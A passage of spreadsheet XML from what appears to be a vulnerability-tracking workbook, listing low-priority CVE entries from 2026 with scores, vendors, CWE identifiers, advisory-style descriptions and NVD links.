          <t>CVE-2026-78635</t>
        </is>
      </c>
      <c r="C2131" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D2131" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2131" s="5" t="inlineStr"/>
      <c r="F2131" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2131" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2131" s="5" t="inlineStr"/>
      <c r="I2131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2131" s="5" t="inlineStr"/>
      <c r="K2131" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L2131" s="5" t="inlineStr">
        <is>
          <t>The Okta Privileged Access client URL handler does not insert an option terminator before appending the target value to the command-line arguments. When a scaleft:// protocol handler link contains a value beginning with a hyphen, the underlying CLI framework interprets it as a command-line flag, causing unintended modification of the SSH client's behavior.</t>
        </is>
      </c>
      <c r="M2131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78635</t>
        </is>
      </c>
    </row>
    <row r="2132">
      <c r="A2132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79723</t>
        </is>
      </c>
      <c r="C2132" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D2132" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2132" s="5" t="inlineStr"/>
      <c r="F2132" s="5" t="inlineStr"/>
      <c r="G2132" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2132" s="5" t="inlineStr"/>
      <c r="I2132" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2132" s="5" t="inlineStr"/>
      <c r="K2132" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2132" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to obtain sensitive information due to improper validation of user-controlled API endpoints.</t>
        </is>
      </c>
      <c r="M2132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79723</t>
        </is>
      </c>
    </row>
    <row r="2133">
      <c r="A2133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16693</t>
        </is>
      </c>
      <c r="C2133" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D2133" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2133" s="5" t="inlineStr"/>
      <c r="F2133" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2133" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2133" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2133" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2133" s="5" t="inlineStr"/>
      <c r="K2133" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L2133" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to obtain sensitive information due to the use of hardcoded cryptographic constants to obfuscate encryption keys.</t>
        </is>
      </c>
      <c r="M2133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16693</t>
        </is>
      </c>
    </row>
    <row r="2134">
      <c r="A2134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19729</t>
        </is>
      </c>
      <c r="C2134" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D2134" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2134" s="5" t="inlineStr"/>
      <c r="F2134" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2134" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H2134" s="5" t="inlineStr"/>
      <c r="I2134" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2134" s="5" t="inlineStr"/>
      <c r="K2134" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2134" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the key provider component of the keycloak-services library, which is the core engine for the Red Hat Build of Keycloak. The issue occurs because a previous fix for path probing was incomplete, allowing a realm administrator to still submit arbitrary filesystem paths as keystore parameters. This can be used to determine the existence and readability of files on the server, potentially exposing sensitive system information.</t>
        </is>
      </c>
      <c r="M2134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19729</t>
        </is>
      </c>
    </row>
    <row r="2135">
      <c r="A2135" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22575</t>
        </is>
      </c>
      <c r="C2135" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D2135" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2135" s="5" t="inlineStr"/>
      <c r="F2135" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2135" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H2135" s="5" t="inlineStr"/>
      <c r="I2135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2135" s="5" t="inlineStr"/>
      <c r="K2135" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2135" s="5" t="inlineStr">
        <is>
          <t>An improper access control vulnerability in Fortinet FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.10, FortiManager 7.2 all versions, FortiManager Cloud 7.6.2 through 7.6.4, FortiManager Cloud 7.4.1 through 7.4.10, FortiManager Cloud 7.2 all versions may allow an administrator to bypass the approval process for workflow sessions via crafted HTTP or HTTPs requests.</t>
        </is>
      </c>
      <c r="M2135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22575</t>
        </is>
      </c>
    </row>
    <row r="2136">
      <c r="A2136" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78624</t>
        </is>
      </c>
      <c r="C2136" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D2136" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2136" s="5" t="inlineStr"/>
      <c r="F2136" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2136" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2136" s="5" t="inlineStr"/>
      <c r="I2136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2136" s="5" t="inlineStr"/>
      <c r="K2136" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2136" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway backup restore function does not validate the filename embedded in an encrypted backup payload. This results in writing file contents to unintended locations on the appliance filesystem.</t>
        </is>
      </c>
      <c r="M2136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78624</t>
        </is>
      </c>
    </row>
    <row r="2137">
      <c r="A2137" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0304</t>
        </is>
      </c>
      <c r="C2137" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2137" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2137" s="5" t="inlineStr"/>
      <c r="F2137" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2137" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H2137" s="5" t="inlineStr"/>
      <c r="I2137" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2137" s="5" t="inlineStr"/>
      <c r="K2137" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L2137" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Palo Alto Networks Cortex XDR Broker VM enables an authenticated low privileged user with man-in-the-middle (MitM) access to execute code with root privileges on the Broker VM.</t>
        </is>
      </c>
      <c r="M2137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0304</t>
        </is>
      </c>
    </row>
    <row r="2138">
      <c r="A2138" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40175</t>
        </is>
      </c>
      <c r="C2138" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2138" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2138" s="5" t="inlineStr"/>
      <c r="F2138" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G2138" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2138" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2138" s="5" t="inlineStr">
        <is>
          <t>2026-04-10</t>
        </is>
      </c>
      <c r="J2138" s="5" t="inlineStr"/>
      <c r="K2138" s="5" t="inlineStr">
        <is>
          <t>CWE-113, CWE-444, CWE-915, CWE-918</t>
        </is>
      </c>
      <c r="L2138" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Versions prior to 1.15.0 and 0.3.1 are vulnerable to a specific gadget-style attack chain in which prototype pollution in a third-party dependency may be leveraged to inject unsanitized header values into outbound requests. This vulnerability is fixed in 1.15.0 and 0.3.1.</t>
        </is>
      </c>
      <c r="M2138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40175</t>
        </is>
      </c>
    </row>
    <row r="2139">
      <c r="A2139" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45572</t>
        </is>
      </c>
      <c r="C2139" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2139" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2139" s="5" t="inlineStr"/>
      <c r="F2139" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2139" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2139" s="5" t="inlineStr"/>
      <c r="I2139" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2139" s="5" t="inlineStr"/>
      <c r="K2139" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2139" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.30.9, from 0.31.0 before 0.31.5, and in 0.32.0.rc1 before 0.32.0.rc2, an administrator with landing-page editing privileges can store arbitrary HTML and JavaScript in an HTML content block, which Decidim::ContentBlocks::HtmlCell#html_content renders without sanitization, causing the script to execute in visitors' browsers. This issue is fixed in versions 0.30.9, 0.31.5, and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M2139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45572</t>
        </is>
      </c>
    </row>
    <row r="2140">
      <c r="A2140" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53529</t>
        </is>
      </c>
      <c r="C2140" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2140" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2140" s="5" t="inlineStr"/>
      <c r="F2140" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2140" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2140" s="5" t="inlineStr"/>
      <c r="I2140" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2140" s="5" t="inlineStr"/>
      <c r="K2140" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2140" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Prior to version 0.10.2, page titles returned by the search API could be rendered as raw HTML in the frontend. A user with editor or administrator permissions could create or modify a page title containing an HTML/JavaScript payload. When another user searched for a matching term, the payload could execute in the victim’s browser. The impact depends on deployment configuration. With `--public-access` enabled, unauthenticated visitors could be affected. In authenticated-only deployments, the issue could be used for cross-user XSS against logged-in users who can access search results. The issue has been fixed in version 0.10.2 by ensuring that author-controlled page titles in search results are not interpreted as raw HTML by the browser while preserving search result highlighting.</t>
        </is>
      </c>
      <c r="M2140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53529</t>
        </is>
      </c>
    </row>
    <row r="2141">
      <c r="A2141" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67612</t>
        </is>
      </c>
      <c r="C2141" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2141" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2141" s="5" t="inlineStr"/>
      <c r="F2141" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2141" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2141" s="5" t="inlineStr"/>
      <c r="I2141" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J2141" s="5" t="inlineStr"/>
      <c r="K2141" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2141" s="5" t="inlineStr">
        <is>
          <t>OpenEMR through 8.2.0 contains a stored cross-site scripting vulnerability in the patient portal template system that allows authenticated administrators to inject arbitrary HTML and JavaScript by storing malicious payloads through the template save mode, which only filters literal PHP open tags. Attackers can exploit the lack of output encoding at the template retrieval endpoint combined with missing HttpOnly cookie attributes to exfiltrate session tokens via document.cookie access, enabling full session hijacking of any admin, clinician, or portal patient who views a poisoned template.</t>
        </is>
      </c>
      <c r="M2141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67612</t>
        </is>
      </c>
    </row>
    <row r="2142">
      <c r="A2142" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67617</t>
        </is>
      </c>
      <c r="C2142" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2142" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2142" s="5" t="inlineStr"/>
      <c r="F2142" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2142" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2142" s="5" t="inlineStr"/>
      <c r="I2142" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J2142" s="5" t="inlineStr"/>
      <c r="K2142" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2142" s="5" t="inlineStr">
        <is>
          <t>Microweber CMS through 2.0.20 contains a stored cross-site scripting vulnerability in the content tagging system that allows admin-authenticated attackers to inject arbitrary JavaScript by submitting malicious payloads via the tag_names parameter of the GET /api/save_content_admin endpoint, bypassing three independent sanitization controls including XSS middleware that ignores GET requests, a strip_unsafe() function that only matches double-quoted onerror attributes, and a titlecase normalizer that passes HTML decimal entity-encoded payloads through unchanged. Attackers can store malicious scripts that execute without user interaction for every visitor to the public blog page and within the admin post editor, enabling session riding through same-origin fetch requests using the CSRF token embedded in the page.</t>
        </is>
      </c>
      <c r="M2142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67617</t>
        </is>
      </c>
    </row>
    <row r="2143">
      <c r="A2143" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69474</t>
        </is>
      </c>
      <c r="C2143" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2143" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2143" s="5" t="inlineStr"/>
      <c r="F2143" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2143" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2143" s="5" t="inlineStr"/>
      <c r="I2143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2143" s="5" t="inlineStr"/>
      <c r="K2143" s="5" t="inlineStr">
        <is>
          <t>CWE-126, CWE-416</t>
        </is>
      </c>
      <c r="L2143" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Overlay Filter allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69474</t>
        </is>
      </c>
    </row>
    <row r="2144">
      <c r="A2144" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69615</t>
        </is>
      </c>
      <c r="C2144" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2144" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2144" s="5" t="inlineStr"/>
      <c r="F2144" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2144" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2144" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I2144" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2144" s="5" t="inlineStr"/>
      <c r="K2144" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2144" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M2144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69615</t>
        </is>
      </c>
    </row>
    <row r="2145">
      <c r="A2145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70589</t>
        </is>
      </c>
      <c r="C2145" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2145" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2145" s="5" t="inlineStr"/>
      <c r="F2145" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2145" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2145" s="5" t="inlineStr"/>
      <c r="I2145" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2145" s="5" t="inlineStr"/>
      <c r="K2145" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2145" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 4.22.0 until 6.54.1, a missing validation check allowed users to redeem subscription offers that were no longer active. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M2145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70589</t>
        </is>
      </c>
    </row>
    <row r="2146">
      <c r="A2146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70590</t>
        </is>
      </c>
      <c r="C2146" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2146" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2146" s="5" t="inlineStr"/>
      <c r="F2146" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2146" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2146" s="5" t="inlineStr"/>
      <c r="I2146" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2146" s="5" t="inlineStr"/>
      <c r="K2146" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2146" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. Prior to 6.54.1, any staff-level user was able to leak the hashed passwords of other staff users through the Ghost Admin API. An offline password-guessing attack against the hashes could lead to account takeover if successful, but Device Verification should have prevented an attacker from logging in with a recovered password. Depending on the database used, leaked hashes may not have had the correct casing for all characters, increasing the difficulty of a password-guessing attack. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M2146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70590</t>
        </is>
      </c>
    </row>
    <row r="2147">
      <c r="A2147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71325</t>
        </is>
      </c>
      <c r="C2147" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2147" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2147" s="5" t="inlineStr"/>
      <c r="F2147" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2147" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H2147" s="5" t="inlineStr"/>
      <c r="I2147" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2147" s="5" t="inlineStr"/>
      <c r="K2147" s="5" t="inlineStr">
        <is>
          <t>CWE-653, CWE-863</t>
        </is>
      </c>
      <c r="L2147" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open-source edge router that makes publishing services a fun and easy experience. Prior to 2.11.54, 3.6.25, and 3.7.10, cross-namespace @kubernetescrd references are not rejected for TraefikService backend references resolved by the service resolver. A tenant confined by RBAC to a single namespace can therefore bind its own router to a TraefikService owned by another namespace and expose or reroute that namespace's backend, defeating the namespace isolation allowCrossNamespace=false is meant to enforce. This issue is fixed in version 2.11.54, 3.6.25, 3.7.10.</t>
        </is>
      </c>
      <c r="M2147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71325</t>
        </is>
      </c>
    </row>
    <row r="2148">
      <c r="A2148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71850</t>
        </is>
      </c>
      <c r="C2148" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2148" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2148" s="5" t="inlineStr"/>
      <c r="F2148" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2148" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2148" s="5" t="inlineStr"/>
      <c r="I2148" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2148" s="5" t="inlineStr"/>
      <c r="K2148" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L2148" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. From 3.8.0 to 4.12.33, memo() from hono/jsx retains the result of a server side render and reuses it for later renders with comparator equal props, and request scoped values read inside the component take no part in that comparison, so a response can contain HTML rendered for another user's request. Components wrapped with memo() are compared by props alone; values read implicitly during rendering, such as JSX Context through createContext() and useContext(), useRequestContext() from hono/jsx-renderer, and getContext() from hono/context-storage, do not participate, and the retained result lives as long as the wrapped component, so it outlives the request that produced it. A user may receive a response containing HTML rendered for another user when both render the same memoized component with comparator equal props on the same warm instance, which may disclose another user's account or profile data, disclose request scoped secrets embedded in HTML such as CSRF tokens, or expose role specific content to users who should not receive it. This issue is fixed in version 4.12.34.</t>
        </is>
      </c>
      <c r="M2148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71850</t>
        </is>
      </c>
    </row>
    <row r="2149">
      <c r="A2149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71852</t>
        </is>
      </c>
      <c r="C2149" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2149" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2149" s="5" t="inlineStr"/>
      <c r="F2149" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2149" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2149" s="5" t="inlineStr"/>
      <c r="I2149" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2149" s="5" t="inlineStr"/>
      <c r="K2149" s="5" t="inlineStr">
        <is>
          <t>CWE-834</t>
        </is>
      </c>
      <c r="L2149" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.15.0, a crafted PDF can cause long runtimes and large memory consumption when pypdf/_font.py function Font._collect_cid_character_widths expands unusually large CID font /W width ranges or excessive width entries during text extraction. This issue is fixed in 6.15.0.</t>
        </is>
      </c>
      <c r="M2149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71852</t>
        </is>
      </c>
    </row>
    <row r="2150">
      <c r="A2150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71870</t>
        </is>
      </c>
      <c r="C2150" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2150" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2150" s="5" t="inlineStr"/>
      <c r="F2150" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2150" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2150" s="5" t="inlineStr"/>
      <c r="I2150" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2150" s="5" t="inlineStr"/>
      <c r="K2150" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2150" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.15.0, a crafted PDF can cause large memory consumption when pypdf/_cmap.py function parse_bfrange parses unusually large source-code or destination-string tokens in a font /ToUnicode CMap during text extraction. This issue is fixed in 6.15.0.</t>
        </is>
      </c>
      <c r="M2150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71870</t>
        </is>
      </c>
    </row>
    <row r="2151">
      <c r="A2151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75904</t>
        </is>
      </c>
      <c r="C2151" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2151" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2151" s="5" t="inlineStr"/>
      <c r="F2151" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2151" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2151" s="5" t="inlineStr"/>
      <c r="I2151" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2151" s="5" t="inlineStr"/>
      <c r="K2151" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2151" s="5" t="inlineStr">
        <is>
